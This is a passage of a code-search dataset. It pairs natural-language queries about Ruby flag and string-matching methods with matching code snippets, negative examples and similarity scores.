"def is_found_exactly_in?(array_of_courses)\n # Define the list of attributes to match. This list must be updated regularly.\n key_attributes = [\n \"crn\",\n \"gwid\",\n \"section\",\n \"course_name\",\n \"hours\",\n \"days\",\n \"day1_start\",\n \"day1_end\",\n \"day2_start\",\n \"day2_end\",\n \"day3_start\",\n \"day3_end\",\n \"day4_start\",\n \"day4_end\",\n \"day5_start\",\n \"day5_end\",\n \"day6_start\",\n \"day6_end\",\n \"day7_start\",\n \"day7_end\",\n \"llm_only\",\n \"jd_only\",\n \"course_name_2\",\n \"alt_schedule\",\n \"additional_info\",\n \"professor\",\n \"prof_id\",\n \"final_time\",\n \"final_date\",\n \"school\"\n ]\n return Scraper.deep_match_course_attributes(key_attributes, self, array_of_courses)\n end",
"def matches?(input_string)\n @word_list.include? input_string\n end",
"def multiple?\n @multi\n end",
"def multiple?\n @multi\n end",
"def in_all_strings?(long_strings, substring)\n long_strings.map do |str|\n str.split.any?(substring)\n end.all?(true)\nend",
"def matches?(value, context); end",
"def in_all_strings?(long_strings, short_string)\n long_strings.all? do |long_string|\n long_string.include?(short_string)\n end\nend",
"def matches(str)\n each_match(str).to_a\n end",
"def has_match?(p1, p2)\n\t\t! (Match[:p1_id => p1.id, :p2_id => p2.id] or Match[:p2_id => p1.id, :p1_id => p2.id]).nil?\n\tend",
"def got_three? array\n\tarray.each.with_index{|x,i| return true if (x == array[i+1] && x == array[i+2])}\n\treturn false\nend",
"def test_token_ambiguity\n @tokens.keys.each{|i|\n @tokens.keys.each{|j|\n if(i!=j) then\n ti = @tokens[i]\n tj = @tokens[j]\n\n # Loop over all possible values for each given token\n ti.each{|tiv|\n tj.each{|tjv|\n return true if tiv[0..Math::min(tiv.length, tjv.length)-1] == tjv[0..Math::min(tiv.length, tjv.length)-1]\n }\n }\n end\n }\n }\n return false\n end",
"def repeated?(guessed_char, running_guess, misses)\n guess_downcase = guessed_char.downcase\n running_guess.include?(guess_downcase) || misses.include?(guess_downcase)\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def multiple?\r\n not single?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def contains_all?(other)\n (other & self) == self\n end",
"def match?\n patterns.each do |pattern|\n result = if pattern.respond_to? :yield\n pattern.yield element\n else\n element.to_s.scan(pattern).flatten\n end\n\n unless result.nil? || result.empty?\n @pattern = pattern\n @match = result\n return true\n end\n end\n\n @pattern = nil\n @match = nil\n false\n end",
"def any_two?\n results=[]\n [@hand1Values, @hand2Values].each do |handV|\n freqHash = Hash.new(0)\n handV.each { |h| freqHash[h] += 1}\n results << freqHash.values.any? { |freq| freq >= 2}\n end\n\n results\n end",
"def exact_matches(loc=@counter)\n matches = 0\n 4.times{ |x| matches += 1 if @guessgrid[loc][x] == @code[x] }\n matches\n end",
"def compound_query?\n @split_query_strings.size > 1\n end",
"def dup_args_ms(arr)\n arr.any? {|e| arr.count(e) > 1} ? true : false\nend"
] | [
"0.6815673",
"0.6742606",
"0.6726413",
"0.6694285",
"0.6620158",
"0.6601435",
"0.6599376",
"0.6591933",
"0.6579682",
"0.6571317",
"0.64545715",
"0.6444007",
"0.64392936",
"0.6410695",
"0.63753486",
"0.6371641",
"0.6356452",
"0.62906396",
"0.62896234",
"0.628535",
"0.6248091",
"0.6223291",
"0.61928195",
"0.6180809",
"0.61788476",
"0.6172857",
"0.613986",
"0.6124676",
"0.6088994",
"0.60751015",
"0.60674334",
"0.6053252",
"0.60461944",
"0.6017838",
"0.60170275",
"0.60131013",
"0.6012454",
"0.60076916",
"0.5994914",
"0.5986497",
"0.59862584",
"0.59840673",
"0.59807545",
"0.5980647",
"0.5978101",
"0.5973897",
"0.5965355",
"0.59596646",
"0.5948644",
"0.59470344",
"0.5945101",
"0.5938067",
"0.5935619",
"0.59278",
"0.5927447",
"0.59050125",
"0.5890909",
"0.58798695",
"0.58761173",
"0.58708876",
"0.587065",
"0.5862541",
"0.5854867",
"0.58519673",
"0.58360267",
"0.58347785",
"0.5828068",
"0.58167696",
"0.5813285",
"0.5805914",
"0.5797466",
"0.5795772",
"0.57875514",
"0.5783559",
"0.5783096",
"0.57818675",
"0.5773264",
"0.5767506",
"0.57585686",
"0.57555956",
"0.5751964",
"0.5751964",
"0.575074",
"0.575063",
"0.57471806",
"0.57429814",
"0.57347405",
"0.57340735",
"0.57330346",
"0.57321244",
"0.5728402",
"0.5728337",
"0.5721202",
"0.5721202",
"0.5718882",
"0.57128036",
"0.5711942",
"0.57107884",
"0.57070696",
"0.5703976"
] | 0.7021841 | 0 |
Return whether the unique match was a hit on the negative (`no`) case, or `nil` if not found or not unique. | def unique_flag_negative?
found_unique? ? @flags.first[2] : nil
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matched?\n not @match.equal?(nil)\n end",
"def not_a_match(no)\n if no == false\n @e += 1 \n else nil \n end\n end",
"def found_unique?\n @flags.size == 1\n end",
"def match?\n false\n end",
"def has?(arg)\n !!find(arg)\n end",
"def opt_unique?(str)\n\texists = {}\n\tfor i in 0..str.length-1\n\t\tif exists[str[i]]\n\t\t\treturn false\n\t\telse\n\t\t\texists[str[i]] = true\n\t\tend\n\tend\n\ttrue\nend",
"def unique?\n !! @unique\n end",
"def check_unique\n bar = Bar.where(:name => self.name, :user_id => self.user_id)\n if bar != nil\n \treturn false\n end\n end",
"def negative_match?(rule, search_criteria)\n rule.criteria.any? do |criterium, values|\n values.is_a?(Hash) && values[:not]&.any?(search_criteria[criterium])\n end\n end",
"def found_exact?\n @found_exact\n end",
"def not_found(u, a)\n f = true\n\t\ta.each do |ss|\n\t\t\tif ss[\"user_id\"] == u\n\t\t\t\tf = false\n\t\t\t\tbreak\n\t\t\tend\n\t\tend\n\t\treturn f\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def unique?\r\n @opts[:unique]\r\n end",
"def unique?\n @unique\n end",
"def hit_or_miss\n\t\t\treturn :win if value = svalue\n\t\t\treturn :miss if value = none_empty\n\t\tend",
"def nil?\n @matches.nil?\n end",
"def unique?\n if @data.fetch(:Index_type) == \"UNIQUE\" || @data.fetch(:Non_unique).to_i == 0\n return true\n else\n return false\n end\n end",
"def unique?\n return @data[\"unique\"]==true\n end",
"def unique?(name)\n tgts = resolve_mapping(name)\n targets = tgts.is_a?(Array) ? tgts : find(tgts)\n targets.size == 1\n end",
"def what_is_unique?\n cache_options[:unique].to_s =~ /true|false/\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n false\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def unique?\n if defined?(@unique)\n @unique\n else\n true\n end\n end",
"def uniq?(uniq)\n { 'false': false, 'true': true }[uniq.to_sym]\n end",
"def missing_one_at_either_end\n [2,3].each { |i|\n return true if @counts[i]>0 && @counts[i+1]>0 && @counts[i+2]>0\n }\n return false\n end",
"def find?\n find_duplicate.nil?\n end",
"def mapsUnique?()\n return false unless passed_filter?\n return false if unmapped_Ns? || unmapped?\n if @chrom =~ /^\\d+:\\d+:\\d+$/\n false\n else\n true\n end\n end",
"def unique?(field)\n !multiple?(field)\n end",
"def matched?\n !failed?\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def unique?\n self[:unique] ? true : false\n end",
"def exists?\n return @x != -999\n end",
"def exact_match?\n !partial_match?\n end",
"def exact_match_string\n @matches.nil? ? nil : @matches[0]\n end",
"def unique_val?\n @lower == @upper\n end",
"def my_none?(pattern = nil)\n test = true\n if (block_given?)\n self.my_each do |x|\n test = test && !yield(x)\n end\n else\n if(pattern.nil?)\n self.my_each do |x|\n test = test && (x==false)\n end\n else\n self.my_each do |x|\n test = test && !x.match?(pattern)\n end\n end\n end\n return test\n end",
"def no_match() \n if $match_index_arr == []\n $turns = $turns - 1\n $index = $index + 1\n end\n end",
"def matched?( other = nil )\n return full? if other.nil?\n matches.include? other\n end",
"def unique?\n if @args[:data][:Index_type] == \"UNIQUE\"\n return true\n else\n return false\n end\n end",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def is_unambiguous?\n RANKS.each do |r|\n if !send(r).nil?\n return false unless !send(r).nil? && !unambiguous_at?(r).nil?\n end\n end\n true\n end",
"def missing_one_in_middle\n regex1 = /[1-6]x[1-6][1-6]/ # example: \" x23x5x\"\n regex2 = /[1-6][1-6]x[1-6]/ # example: \" x2x45x\"\n return ( @distribution.match(regex1) || @distribution.match(regex2) )\n=begin\n [1,2,3].each { |i| \n return true if @counts[i]>0 && @counts[i+1]==0 && counts[i+2]>0 && counts[i+3]>0\n return true if @counts[i]>0 && @counts[i+1]>0 && counts[i+2]==0 && counts[i+3]>0\n }\n return false\n=end\n end",
"def positive_match?(rule, search_criteria)\n rule.criteria.all? do |criterium, values|\n values = case values\n when Hash\n values[:or] || []\n when String\n [values]\n else\n values\n end\n\n # Always treat 'group' criterium (ignored) and the wildcard as matching\n criterium == 'group' || values == ['any'] || values.nil? || values.any?(search_criteria[criterium])\n end\n end",
"def unique_key? object\n _check = self.find(object.key)\n _unique = !_check || _check != object\n end",
"def my_none? (pattern = false)\n if block_given?\n self.my_each{|item| return false if yield item}\n elsif !!pattern == true\n self.my_each{|item| return false if pattern === item}\n else\n self.my_each{|item| return false if !!item}\n end\n true\n end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def most_likely_duplicate\n possible_matching_people.first\n end",
"def is_unique?(str)\n\nend",
"def exists? value\n !self[index_of(value)].nil?\n end",
"def exists? value\n !self[index_of(value)].nil?\n end",
"def has_match?(p1, p2)\n\t\t! (Match[:p1_id => p1.id, :p2_id => p2.id] or Match[:p2_id => p1.id, :p1_id => p2.id]).nil?\n\tend",
"def is_false_duplicate?\n payment_complete? && has_completed_duplicates?\n end",
"def match_without_pinning(input)\n case input\n in [a, a] # We'd like to assert that the first and second elements are equal\n a\n else\n '-'\n end\nend",
"def expects_none?\n count_specified? ? matches_count?(0) : false\n end",
"def found?\n\t\t\t!!@found\n\t\tend",
"def is_matched(ind)\n\t\treturn @tile_Array[ind].return_match\n\tend",
"def unique?\n indexes.any?{|i| i.unique}\n end",
"def get_no_match_score(input)\n n, o = input.split('')\n\n score = 0\n score += N_MATCH.fetch(n) if N_MATCH.key?(n)\n score += O_MATCH.fetch(o) if O_MATCH.key?(o)\n score\n end",
"def hit_miss(slot, tag)\n if slot.tag == tag and slot.is_valid == 1\n return \"hit\"\n else\n return \"miss\"\n end\n end",
"def [](n)\n @matched ? @matches[n] : nil\n end",
"def none?\n @value.to_s.empty? or /\\Anone\\z/io.match(@value.to_s)\n end",
"def no?\r\n input.to_s[0,1].downcase == 'n' or input.to_i == 2\r\n end",
"def find?(word)\n !find(word).empty?\n end",
"def hit_itself?\n # list.uniq removes all repeated elements from a list\n @positions.uniq.length != @positions.length\n end",
"def negative?(word)\n [ 'dull',\n 'boring',\n 'annoying',\n 'chaotic'\n ].include?(word)\nend",
"def pair_not_overlapping?\n !(self.match(/([a-z][a-z]).*\\1/)).nil?\n end",
"def judge_signal(instance,signal,noneqList_custom)\n flag = true\n noneqList_custom.each do |inst,data|\n if inst == instance\n flag = false unless data.noneq_points.index(\"#{signal}\").nil?\n flag = false unless data.nocor_points.index(\"#{signal}\").nil?\n end\n end\n return flag\n end",
"def stop_if_match; true; end",
"def unique(suffix) \n check = Url.where(suffix: suffix).first\n if check == nil\n return true\n else\n return false\n end\n end",
"def uniquely_identified_by_any_peptides?\n unique_spectra > 0\n end",
"def non_nil?(item)\n !self[item].nil?\n end",
"def mem(key)\n nil == find(key)\n end",
"def match(n)\n str = n.to_s\n return false unless str[0] == 1.to_s\n return false unless str[2] == 2.to_s\n return false unless str[4] == 3.to_s\n return false unless str[6] == 4.to_s\n return false unless str[8] == 5.to_s\n return false unless str[10] == 6.to_s\n return false unless str[12] == 7.to_s\n return false unless str[14] == 8.to_s\n return false unless str[16] == 9.to_s\n return true\nend",
"def not_found?\n @flags.empty?\n end",
"def terminal?\n matches.length == 0\n end",
"def methodChecksIfStringUnique(parameter_string) \n\thash_to_return = {}\n\n\tparameter_string.each_char do |char|\n\t\thash_to_return[char].nil? ? hash_to_return[char] = true : (return false)\n\tend\n\n\ttrue\n\t\nend",
"def match\n true\n end",
"def found?\n return false if no_search\n\n id.present? || records.present?\n end",
"def legal_check(a,b) \n legal=[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"J\",\"Q\",\"K\",\"A\"]\n \n if b==nil # || b==nil (i think this works)\n puts \"Invalid move!\"\n return false\n elsif (b==\"1\" || b==\"2\" || b==\"3\" || b==\"4\") && a==nil #doesnt work\n return true #doesnt work\n elsif (legal.index(a)-legal.index(b)).abs<=1\n return true\n elsif a==\"2\" && b==\"A\"\n return true\n elsif a==\"A\" && b==\"2\"\n return true\n else\n puts \"Illegal move!\"\n return false\n end\nend",
"def matches(value)\n output, status = provider.run_unless_sql_command(value)\n output='0' unless status == 0\n\n result_count = output.strip.to_i\n self.debug(\"Found #{result_count} row(s) executing 'unless' clause\")\n result_count > 0\n end",
"def exact?\n !!@repeat\n end",
"def unique_number(arr)\n existing_numbers = []\n not_unique = []\n arr.each do |entry|\n if existing_numbers[entry] === nil\n existing_numbers[entry] = true\n else\n not_unique[entry] = true\n end\n end\n arr.each do |entry|\n if not_unique[entry] == nil\n return entry\n end\n end\nend",
"def unknow\r\n return false unless unknow?\r\n @unknow.shift\r\n end",
"def hyphen_absent?\r\n aba_routing_no_frm_db_with_hyphen = @micr_line_info.aba_routing_number.match(/[\\-]/)\r\n payer_account_no_frm_db_with_hyphen = @micr_line_info.payer_account_number.match(/[\\-]/)\r\n hyphen_absent = aba_routing_no_frm_db_with_hyphen == nil &&\r\n payer_account_no_frm_db_with_hyphen == nil\r\n end",
"def one_off?(win_number,my_number)\n\tmatches = 0\n\tif win_number[0] == my_number[0]\n\t\tmatches +=1\n\tend\n\tif win_number[1] == my_number[1]\n\t\tmatches +=1\n\tend\n\tif win_number[2] == my_number[2]\n\t\tmatches +=1\n\tend\n\tif win_number[3] == my_number[3]\n\t\tmatches +=1\n\tend\n\tif matches == 3\n\t\ttrue\n\telse\n\t\tfalse\n\tend\n\t\t#compare each digit of my entry to winning entry\n\t\t#if item == my_number\nend",
"def double?\n if self.id\n return true if self.torrent_url && Torrent.not_self(self.id).find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.not_self(self.id).find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.not_self(self.id).find_by_name(self.name)\n else\n return true if self.torrent_url && Torrent.find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.find_by_name(self.name) \n end\n \n \n return false\n end",
"def near_match?(choice)\n @comp.code_combination.include?(choice)\n end",
"def is_negative?\n return NEGATIVE_RESPONSES.include?(self)\n end",
"def normal?\n (not wildcard?) and (not absorbent?)\n end",
"def loose_match?(unit)\n return false if @type != unit.type\n return false if custom? && @custom_name.casecmp(unit.custom_name) != 0\n true\n end",
"def found_using_numeric_id?\n !found_using_friendly_id?\n end",
"def unigram_exists(word)\n\t$unigrams.each do |x|\n\t\tif x.matches(word)\n\t\t\tx.increase_count\n\t\t\treturn true\n\t\tend\t\n\tend\n\treturn false\nend",
"def same_or_dif? card_arr\n card_arr.uniq.size != 2\nend",
"def includedOnce(haystack, needle)\n \n counter = haystack.count { |x| x == needle}\n if counter == 1\n return true\n elsif counter > 1\n return false\n else\n return false\n end\n \nend"
] | [
"0.62677383",
"0.6039822",
"0.58324856",
"0.5694558",
"0.55955046",
"0.5581306",
"0.55777735",
"0.5427091",
"0.5362162",
"0.5359665",
"0.535418",
"0.52943647",
"0.52836794",
"0.5280835",
"0.5261147",
"0.524693",
"0.5243467",
"0.52339256",
"0.5231494",
"0.5227676",
"0.5221369",
"0.5221369",
"0.5221369",
"0.5208174",
"0.52028364",
"0.52028364",
"0.51886284",
"0.51886284",
"0.51441085",
"0.51418865",
"0.5124628",
"0.51175773",
"0.5116688",
"0.5110124",
"0.5103182",
"0.509935",
"0.5098431",
"0.50731516",
"0.5068426",
"0.50632757",
"0.50139886",
"0.50114393",
"0.500883",
"0.50003755",
"0.49789903",
"0.49663922",
"0.4964738",
"0.49513337",
"0.49472553",
"0.49471185",
"0.4937786",
"0.49315357",
"0.49241847",
"0.4915735",
"0.49117985",
"0.49117985",
"0.4911524",
"0.4911365",
"0.48935264",
"0.48864838",
"0.48801872",
"0.48778373",
"0.48330685",
"0.48000056",
"0.47982875",
"0.4794915",
"0.47916177",
"0.4774147",
"0.47733238",
"0.47675163",
"0.4761703",
"0.4741",
"0.47359818",
"0.47113013",
"0.47079104",
"0.4706767",
"0.47051793",
"0.47012776",
"0.46978766",
"0.4693617",
"0.46863183",
"0.46831185",
"0.46699032",
"0.46655878",
"0.46603996",
"0.4658894",
"0.46453938",
"0.46439356",
"0.46396294",
"0.46383524",
"0.46371928",
"0.46279848",
"0.4623671",
"0.46209267",
"0.46163392",
"0.46133333",
"0.46076852",
"0.46067515",
"0.45983496",
"0.4596319"
] | 0.68606395 | 0 |
Returns an array of the matching full flag strings. | def matching_flag_strings
@flags.map do |_flag, flag_syntax, negative|
negative ? flag_syntax.negative_flag : flag_syntax.positive_flag
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def get_flags(*files)\n matches = []\n begin\n files.each do |f|\n file = File.new(f, 'r')\n while (line = file.gets)\n m = line.match(/(^.*=)?/)\n matches << m[0] if m\n end\n file.close\n end\n rescue => err\n puts 'Exception: #{err}'\n err\n end\n matches.uniq.sort!\nend",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def flag\n flags.join(\", \")\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def form_flagstring(f, fall)\n\t\tflagSelectAll = (!fall.nil? && fall.to_s.downcase == \"all\")\n\t\tif(flagSelectAll || f.nil? || f.empty?)\n\t\t\tflagStr = \"all\"\n\t\telse\n\t\t\tflagStr = f.join(\"|\")\n\t\tend\n\n\t\treturn flagStr\n\tend",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def mask_array\n @mask.split('')\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def flags\n [long, short].compact\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def check_patterns\n [@check_patterns].flatten.compact.uniq\n end",
"def symbols\n @flags.keys\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def get_flag_path_array problem, solution, comment, flag\n if solution.nil?\n path = [problem, comment, flag]\n elsif comment.nil?\n path = [problem, solution, flag]\n else\n path = [problem, solution, comment, flag]\n end\n path\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def resolve_flag(str)\n result = Flag::Resolution.new(str)\n flags.each do |flag_def|\n result.merge!(flag_def.resolve(str))\n end\n result\n end",
"def string_matchers()\n []\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def match(array_of_words)\n matches = [] #Flag\n anagram_execute = anagram.split(//)\n anagram_execute = anagram_execute.sort!\n array_of_words.each do |possible_match|\n array_of_letters = possible_match.split(//)\n array_of_letters = array_of_letters.sort!\n matches << possible_match if array_of_letters == anagram_execute\n #use truncated, cleaner if statement\n end\n matches #return the matches array\n end",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def test_extended_patterns_no_flags\n [\n [ \".*\", \"abcd\\nefg\", \"abcd\" ],\n [ \"^a.\", \"abcd\\naefg\", \"ab\" ],\n [ \"^a.\", \"bacd\\naefg\", \"ae\" ],\n [ \".$\", \"bacd\\naefg\", \"d\" ]\n ].each do |reg, str, result|\n m = RustRegexp.new(reg).match(str)\n puts m.inspect\n unless m.nil?\n assert_equal result, m[0]\n end\n end\n end",
"def match_folder_flags(flags, symbols)\n (flags & Array(symbols).map{|f| f.to_s.downcase.to_sym}.compact).any?\n end",
"def aggressive\n\t# make a matches array. this returns the equivalent of the matches[] block above\n\tm=[]\n\n\n\t# return the matches array, even if it's emtpy\n\tm\nend",
"def to_s\n @flags.join(', ')\n end",
"def flags_to_string(f)\n result = ''\n f.each { |key,value|\n if value then result=result+key end\n }\n return result\nend",
"def has_all_flags?(flag_names)\n flag_names.all? { |flag_name| has_flag?(flag_name) }\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def xlate_flags()\n flags = []\n flags.push('Single Connection') if (flag_single_connection?)\n flags.push('Unencrypted') if (flag_unencrypted?)\n return(flags.join(', ')) if (flags.length != 0)\n return(\"None\")\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def parse_flags(msg)\n msg.scan(/-(\\w+)\\s*([^-]+)?/)\n .uniq{ |e| e[0] }\n .map{ |k, v| [k, v.nil? ? nil : v.squish] }\n .to_h\n .symbolize_keys\nend",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def find_all_regex(sCOMMAND)\n array = Array.new()\n search =/#{sCOMMAND}/\n @commands.each do |command|\n if (command.commandName.match(search) )\n array.push(command)\n end\n\n end\n return array\n end",
"def names\n fs = []\n %w( OUT_OF_ORDER_EXEC_MODE_ENABLE PROFILING_ENABLE ON_DEVICE ON_DEVICE_DEFAULT ).each { |f|\n fs.push(f) if self.include?( self.class.const_get(f) )\n }\n return fs\n end",
"def pattern_indexes\n self.bits ||= 0\n array = bits.to_s(2).rjust(self.step_count, '0').chars.each_with_index.map do |value, index|\n index if value == '1'\n end\n array.compact\n end",
"def begins_with_r(array)\n array.all? do |tool|\n tool.start_with?(\"r\")\nend\nend",
"def get_letter_mask(array, valid_array)\n array = array.split(/[ ,\\.:;\\-+]/) if array.class != Array\n \n str = ''\n array.each do |word|\n word.upcase!\n next if word == 'AND'\n str += word[0].chr if valid_array.include? word[0].chr\n end\n return str\n end",
"def required_flags\n flags.select &:required\n end",
"def get_all_with(s)\n a = []\n self.each do |x|\n if x.include?(s)\n a << x\n end\n end\n return a\n end",
"def fflags\n set = FFI::MemoryPointer.new :ulong\n clear = FFI::MemoryPointer.new :ulong\n C.archive_entry_fflags(entry, set, clear)\n\n [set.get_ulong(0), clear.get_ulong(0)]\n end",
"def flags\n if variables\n (variables[:all][:referenced_enables] + variables[:all][:set_enables]).uniq.sort do |x, y|\n x = x[0] if x.is_a?(Array)\n y = y[0] if y.is_a?(Array)\n # Need to use strings for the comparison as some flags can be a string and some a symbol\n x.to_s <=> y.to_s\n end\n end\n end",
"def cpu_flags\n cpuinfo = cmd_exec('cat /proc/cpuinfo').to_s\n\n return unless cpuinfo.include? 'flags'\n\n cpuinfo.scan(/^flags\\s*:(.*)$/).flatten.join(' ').split(/\\s/).map(&:strip).reject(&:empty?).uniq\n rescue\n raise'Could not retrieve CPU flags'\n end",
"def patterns\n\t\t@@patterns ||= []\n\n\t\tif @@patterns.size == 0\n\t\t\tfor i in 0..9\n\t\t\t\tfor j in 0..9\n\t\t\t\t\tfor k in 0..9\n\t\t\t\t\t\tfor l in 0..9\n\t\t\t\t\t\t\t@@patterns << Regexp.new(\"[#{i}]{4}[#{j}]{4}[#{k}]{4}[#{l}]{4}\")\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\t@@patterns\n\tend",
"def glob(pattern, flags = T.unsafe(nil)); end",
"def strings\n [\n build_identification_string,\n build_flags_string,\n build_info_string,\n build_name_string\n ].compact\n end",
"def matching_opts(arg, list, i)\n\t\t# Returns field of all exactly or abbreviated matching options.\n\t\tm = @option.values.select { |o| o.match?(arg, list, i) == :exact }\n\t\tif m.empty?\n\t\t\t@option.values.select { |o| o.match?(arg, list, i) == :abbrev }\n\t\telse\n\t\t\tm\n\t\tend \n\tend",
"def get_flag_name(flag)\n if flag.start_with?(\"--no-\")\n flag[5..-1]\n elsif flag.start_with?(\"--\")\n flag[2..-1]\n else\n raise \"Assertion error: we're here by mistake\"\n end\nend",
"def get_matching_strings(prefix)\n puts \"Matching for #{prefix}\"\n ptr = @root\n for i in 0..prefix.size-1\n ptr = ptr.children[prefix[i]]\n return nil unless ptr\n end\n arr = []\n arr << prefix if ptr.is_leaf\n arr << get_strings(ptr, prefix)\n arr\n end",
"def search pattern\n\t\tresults = all.map {|key|\n\t\t\tkey if key.to_s =~ /#{pattern}/i\n\t\t}\n\t\tresults.delete nil\n\t\tresults\n\tend",
"def matches(smarts_or_string, uniq=true)\n each_match(smarts_or_string, uniq).map.to_a\n end",
"def bmAltGoodSuffixTable(pattern)\n pattern = pattern.unpack('U*')\n goodSuffix = []\n pattern.length.times do |i| \n value=0 \n while (value < pattern.length && !suffixmatch(pattern, i, value)) do \n value+=1 \n end \n goodSuffix[pattern.length-i-1] = value \n end \n return goodSuffix\nend",
"def list(pattern = /.*/)\n if Gem::Specification.respond_to?(:each)\n Gem::Specification.select{|spec| spec.name =~ pattern }\n else\n Gem.source_index.gems.values.select{|spec| spec.name =~ pattern }\n end\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
